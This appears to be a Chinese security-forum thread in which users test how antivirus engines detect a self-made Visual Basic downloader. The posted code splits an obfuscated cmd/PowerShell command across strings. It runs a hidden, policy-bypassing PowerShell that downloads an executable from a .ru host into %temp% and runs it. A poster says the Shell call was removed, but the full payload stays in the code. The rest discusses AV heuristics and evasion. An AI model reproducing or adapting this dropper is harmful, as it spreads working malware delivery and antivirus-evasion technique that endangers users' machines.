#VB #Downloader (2020-04-08)

QVM360

swizzer 发表于 2020-4-8 18:00
并不是所有的改名都会杀

最开始的样本
我把Shell函数给删了，也就是说没有任何恶意行为，你看看智量报不报
现在的代码

1. Private Sub Form_Load()
   
2. Dim ABT6rB, t78grT, GB7bf79, GB8htUY, OGgT3T9i, e57Vv8O, aiuGBU, oB8rv6, A6V68tf, adhn8u, asdinc8d, dun83qnrw, sadxby7, wdyxb7, as76rvew, qxyee4, afsruf, rn49q8xrn, mmmmm As String
   
3. ABT6rB = "cmd.e"
   
4. t78grT = "xe /c iwbDyExnfh"
   
5. GB7bf79 = "FHuWV & Po^"
   
6. GB8htUY = "wEr^sh^ell.e"
   
7. OGgT3T9i = "^Xe -execut"
   
8. e57Vv8O = "ionpolicy byp"
   
9. aiuGBU = "ass -nopro"
   
10. oB8rv6 = "file -w hidd"
    
11. A6V68tf = "en $v1='Net.W'; $v2='ebCli"
    
12. adhn8u = "ent'; $var = (New-O"
    
13. asdinc8d = "bject $v1$v2); $var.Hea"
    
14. dun83qnrw = "ders['User-Agent'] = 'Googl"
    
15. sadxby7 = "e Chrome'; $var.downloadfile('ht"
    
16. wdyxb7 = "tp://scprodu"
    
17. as76rvew = "cts7.ru/ava"
    
18. qxyee4 = "ilableupdatemanager/pop"
    
19. afsruf = "py.exe','%te"
    
20. rn49q8xrn = "mp%WHk58.ex"
    
21. mmmmm = "e'); & %temp%WHk58.exe & CXorbhFlHAGsKcP"
    
22. End
    
23. End Sub
    

复制代码

54ss

QVM360 发表于 2020-4-8 17:33
改了下代码，你再试试看

BD居然拉黑了，这玩意还有人上报嘛
实时防护检测到威胁。该文件已被删除。C:\Users\JOJO\Desktop\1.exe 是恶意软件 Gen:Suspicious.Cloud.1.nm0@a8duPogb你是不是那BD测过双击了？

swizzer

QVM360 发表于 2020-4-8 18:01
图标不对啊，怎么图标是一头猪
还是MC的猪

那是我同学写的一个连点器

swizzer

a27573 发表于 2020-4-8 18:02
不至于这么弱智
但文件名作为训练的特征之一实在是太。。。

这一点我问过官人，他们觉得这样很正义

我觉得应该是内部有一个可疑的阈值和恶意的阈值，过了可疑阈值而没到恶意阈值的，如果文件名可疑就报Suspicious

智量真是有360的作风，无怪乎其老板曾是360里的人（据称）

swizzer

QVM360 发表于 2020-4-8 18:05
最开始的样本
我把Shell函数给删了，也就是说没有任何恶意行为，你看看智量报不报
现在的代码

改名前不报，改为csrss后报Heur.Suspicious.PE.C

啧啧啧啧啧

a27573

swizzer 发表于 2020-4-8 18:45
改名前不报，改为csrss后报Heur.Suspicious.PE.C

啧啧啧啧啧

这个
没有恶意行为啊

swizzer

a27573 发表于 2020-4-8 18:49
这个
没有恶意行为啊

机器学习固有的弊端而已

你打包个sfx自解压估计都会被杀

智量官方

这种情况是调用了Windows的白文件来执行潜在的危险行为，一般是调用".Net"白文件来实现

QVM360

智量官方 发表于 2020-4-8 19:49
这种情况是调用了Windows的白文件来执行潜在的危险行为，一般是调用".Net"白文件来实现

自己做的毒，只在卡饭发布，怎么会入库杀
是不是蹲点了

陌染淡殇

QVM360 发表于 2020-4-8 21:01
自己做的毒，只在卡饭发布，怎么会入库杀
是不是蹲点了

真相了